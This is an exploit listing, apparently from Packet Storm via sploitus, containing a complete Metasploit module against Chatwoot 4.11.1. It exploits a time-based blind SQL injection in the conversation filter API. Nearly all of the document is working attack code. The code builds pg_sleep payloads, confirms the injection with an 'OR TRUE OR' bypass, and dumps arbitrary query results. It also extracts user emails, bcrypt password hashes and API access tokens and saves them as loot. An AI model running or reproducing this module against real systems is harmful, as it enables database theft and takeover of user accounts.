Share
## https://sploitus.com/exploit?id=PACKETSTORM:223093
==================================================================================================================================
| # Title : Chatwoot 4.11.1 FilterService SQL Injection Module for Authenticated Exposure Validation and Database Extraction |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://www.chatwoot.com |
==================================================================================================================================
[+] Summary : module targets an authenticated SQL injection vulnerability in the conversation filtering functionality of Chatwoot instances up to version 4.11.1.
[+] POC :
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Chatwoot SQL Injection (CVE-CVE-2026-44706) - FilterService#lt_gt_filter',
'Description' => %q{
This module exploits a time-based SQL injection vulnerability in Chatwoot
versions <= 4.11.1. The vulnerability exists in the conversation filter
functionality, allowing an authenticated attacker to execute arbitrary
SQL queries, extract sensitive data, and retrieve user credentials.
},
'Author' => ['indoushka'],
'License' => MSF_LICENSE,
'References' => [
['URL', 'https://hakaisecurity.io'],
['CVE', 'CVE-2026-44706']
],
'DisclosureDate' => '2026-06-09',
'Platform' => 'ruby',
'Arch' => ARCH_CMD,
'Targets' => [['Automatic', {}]],
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS]
}
)
)
register_options([
OptString.new('TARGETURI', [true, 'Base path for Chatwoot', '/']),
OptString.new('API_TOKEN', [true, 'Chatwoot API access token', '']),
OptInt.new('ACCOUNT_ID', [true, 'Target account ID', 1]),
OptEnum.new('ACTION', [true, 'Action to perform', 'check', ['check', 'timebased', 'extract', 'creds']]),
OptString.new('SQL_QUERY', [false, 'SQL query for extract mode', 'SELECT version()']),
OptInt.new('MAX_LEN', [false, 'Maximum string length for extraction', 200]),
OptInt.new('SLEEP_TIME', [false, 'Time in seconds for sleep-based injection', 2]),
OptFloat.new('THRESHOLD', [false, 'Time threshold for detecting sleep (seconds)', 1.5])
])
end
def sleep_time
datastore['SLEEP_TIME']
end
def threshold
datastore['THRESHOLD']
end
def build_payload(injected_sql)
value = "2024-01-01'::date #{injected_sql} 'epoch'::date > '2024-01-01"
{
'payload' => [
{
'attribute_key' => 'created_at',
'filter_operator' => 'is_greater_than',
'values' => [value],
'query_operator' => nil
}
]
}
end
def send_filter_request(payload, timeout = 60)
uri = normalize_uri(target_uri.path, "/api/v1/accounts/#{datastore['ACCOUNT_ID']}/conversations/filter")
res = send_request_cgi(
'method' => 'POST',
'uri' => uri,
'ctype' => 'application/json',
'headers' => {
'api_access_token' => datastore['API_TOKEN']
},
'data' => payload.to_json,
'timeout' => timeout
)
res
rescue ::Rex::ConnectionError, ::Rex::TimeoutError => e
print_error("Request failed: #{e.message}")
nil
end
def blind_check(condition)
sqli = "AND (SELECT CASE WHEN (#{condition}) THEN pg_sleep(#{sleep_time}) ELSE pg_sleep(0) END)::text != 'x' OR"
payload = build_payload(sqli)
start_time = Time.now
send_filter_request(payload, sleep_time + 30)
elapsed = Time.now - start_time
elapsed >= threshold
end
def extract_int(expression, low = 0, high = 10000)
while low <= high
mid = (low + high) / 2
if blind_check("(#{expression}) = #{mid}")
return mid
elsif blind_check("(#{expression}) > #{mid}")
low = mid + 1
else
high = mid - 1
end
end
nil
end
def extract_string(expression, max_len = 200, charset = nil)
charset ||= (('a'..'z').to_a + ('A'..'Z').to_a + ('0'..'9').to_a +
['@', '.', '_', '-', ':', '$', '/', ' ', '!', '#', '%', '^', '&', '*',
'(', ')', '+', '=', '[', ']', '{', '}', '|', ';', "'", ',', '<', '>',
'?', '~', '`', '"', '\\'])
length = extract_int("length((#{expression})::text)", 0, max_len)
return '' unless length
print_status("Extracting #{length} characters...")
result = ''
(1..length).each do |pos|
found = false
charset.each do |ch|
esc = ch.gsub("'", "''")
condition = "substring((#{expression})::text,#{pos},1) = '#{esc}'"
if blind_check(condition)
result << ch
print(ch)
found = true
break
end
end
result << '?' unless found
print('?') unless found
end
print_line
result
end
def check_vulnerability
print_status("Checking vulnerability with OR TRUE bypass...")
normal_payload = {
'payload' => [
{
'attribute_key' => 'created_at',
'filter_operator' => 'is_greater_than',
'values' => ['2099-01-01'],
'query_operator' => nil
}
]
}
normal_res = send_filter_request(normal_payload)
return false unless normal_res&.code == 200
normal_count = JSON.parse(normal_res.body).dig('meta', 'all_count') || 0
malicious_res = send_filter_request(build_payload('OR TRUE OR'))
return false unless malicious_res&.code == 200
malicious_count = JSON.parse(malicious_res.body).dig('meta', 'all_count') || 0
print_status("Normal count: #{normal_count} | Malicious count: #{malicious_count}")
if malicious_count > normal_count
print_good("SQL injection confirmed!")
return true
else
print_error("Inconclusive - target may not be vulnerable")
return false
end
end
def timebased_test
print_status("Testing time-based injection...")
start_time = Time.now
send_filter_request(build_payload("AND (SELECT pg_sleep(0))::text != 'x' OR"))
base_time = Time.now - start_time
print_status("Baseline time: #{'%.2f' % base_time}s")
start_time = Time.now
send_filter_request(build_payload("AND (SELECT pg_sleep(3))::text != 'x' OR"))
sleep_time_actual = Time.now - start_time
print_status("Sleep(3) time: #{'%.2f' % sleep_time_actual}s")
delta = sleep_time_actual - base_time
print_status("Delta: #{'%.2f' % delta}s")
if delta >= 2.5
print_good("Time-based injection confirmed!")
else
print_error("Time-based injection may not be exploitable")
end
end
def extract_data
query = datastore['SQL_QUERY']
max_len = datastore['MAX_LEN']
print_status("Extracting: #{query}")
result = extract_string(query, max_len)
if result.present?
print_good("Result: #{result}")
store_loot('chatwoot_sql_extract', 'text/plain', rhost, result, 'sql_extract.txt', "Extracted SQL query result")
else
print_error("Extraction failed")
end
end
def extract_credentials
print_status("Extracting user credentials...")
print_status("Counting users...")
user_count = extract_int("SELECT count(*) FROM users", 0, 100)
unless user_count && user_count > 0
print_error("Could not determine user count")
return
end
print_good("Found #{user_count} user(s)")
creds = []
hc_charset = ('a'..'z').to_a + ('0'..'9').to_a + ['$', '2', 'a', 'b', '1', '0', '.', '/'] + ('A'..'Z').to_a
ec_charset = ('a'..'z').to_a + ('0'..'9').to_a + ['@', '.', '_', '-', '+'] + ('A'..'Z').to_a
(0...user_count).each do |i|
print_status("Processing user #{i + 1}/#{user_count}")
uid = extract_int("SELECT id FROM users ORDER BY id LIMIT 1 OFFSET #{i}", 1, 100000)
next unless uid
print_status(" ID: #{uid}")
email = extract_string("SELECT email FROM users WHERE id=#{uid}", 100, ec_charset)
password_hash = extract_string("SELECT encrypted_password FROM users WHERE id=#{uid}", 60, hc_charset)
token = extract_string("SELECT token FROM access_tokens WHERE owner_type='User' AND owner_id=#{uid} LIMIT 1", 30)
creds << {
id: uid,
email: email,
hash: password_hash,
token: token
}
print_good(" Email: #{email}") if email.present?
print_good(" Hash: #{password_hash}") if password_hash.present?
print_good(" Token: #{token}") if token.present?
end
creds.each do |cred|
report_cred(
user: cred[:email],
hash: cred[:hash],
private_type: :nonreplayable_hash,
private_data: cred[:hash],
jtr_format: 'bcrypt'
) if cred[:hash].present?
report_cred(
user: cred[:email],
private_type: :password,
private_data: cred[:token]
) if cred[:token].present?
end
loot_data = JSON.pretty_generate(creds)
store_loot('chatwoot_credentials', 'application/json', rhost, loot_data, 'chatwoot_creds.json', 'Extracted credentials')
print_good("Credentials saved to loot")
end
def report_cred(opts = {})
return unless opts[:user].present? && opts[:private_data].present?
credential_data = {
origin_type: :service,
module_fullname: fullname,
username: opts[:user],
private_data: opts[:private_data],
private_type: opts[:private_type] || :password,
workspace_id: myworkspace.id,
address: rhost,
port: rport,
service_name: 'chatwoot',
protocol: 'tcp'
}
create_credential(credential_data)
rescue => e
print_error("Failed to report credential: #{e.message}")
end
def run
unless datastore['API_TOKEN'].present?
print_error("API_TOKEN is required")
return
end
print_status("Verifying authentication...")
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, '/api/v1/profile'),
'headers' => { 'api_access_token' => datastore['API_TOKEN'] }
)
unless res && res.code == 200
print_error("Authentication failed - invalid token or URL")
return
end
begin
profile = JSON.parse(res.body)
print_good("Authenticated as: #{profile['name']} (#{profile['email']}) - Account ID: #{datastore['ACCOUNT_ID']}")
rescue
print_status("Authentication successful")
end
case datastore['ACTION']
when 'check'
check_vulnerability
when 'timebased'
timebased_test
when 'extract'
extract_data
when 'creds'
extract_credentials
end
end
end
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================